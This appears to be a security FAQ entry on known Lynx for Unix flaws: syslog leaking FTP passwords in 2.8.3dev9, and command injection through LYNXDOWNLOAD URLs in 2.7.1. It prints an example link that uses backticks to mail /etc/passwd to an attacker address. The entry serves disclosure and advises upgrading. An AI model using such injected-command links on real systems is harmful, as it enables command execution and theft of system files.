Are there any known problems with Lynx for Unix?
Syslog, 2.8.3dev 9 Syslog information sent from Lynx, in this development release, can include embedded passwords (say, a request for ftp://jns:foopassword@ftp.test.com). The fix was inserted for dev 9, which is far older than the 2.8.3 release candidate and therefore you should upgrade to 2.8.3rel1.1 LynxDownload, 2.7.1 Versions of Lynx through 2.7.1 contain a very ugly hole that allows a Web author to execute arbitrary commands on the user’s machine, simply by crafting a LYNXDOWNLOAD URL containing backtick characters. For example, selecting this URL will cause the contents of the system password file to be mailed out across the Internet: < a href="LYNXDOWNLOAD://Method=-1/File=`mail%20hackers@hack.com%3C/etc/passwd`/SugFile=test"> CLICK HERE This is an example of failing to check user-provided parameters for the presence of shell metacharacters, a problem that has plagued CGI developers for years. Upgrade to a more recent version of Lynx as soon as you can.
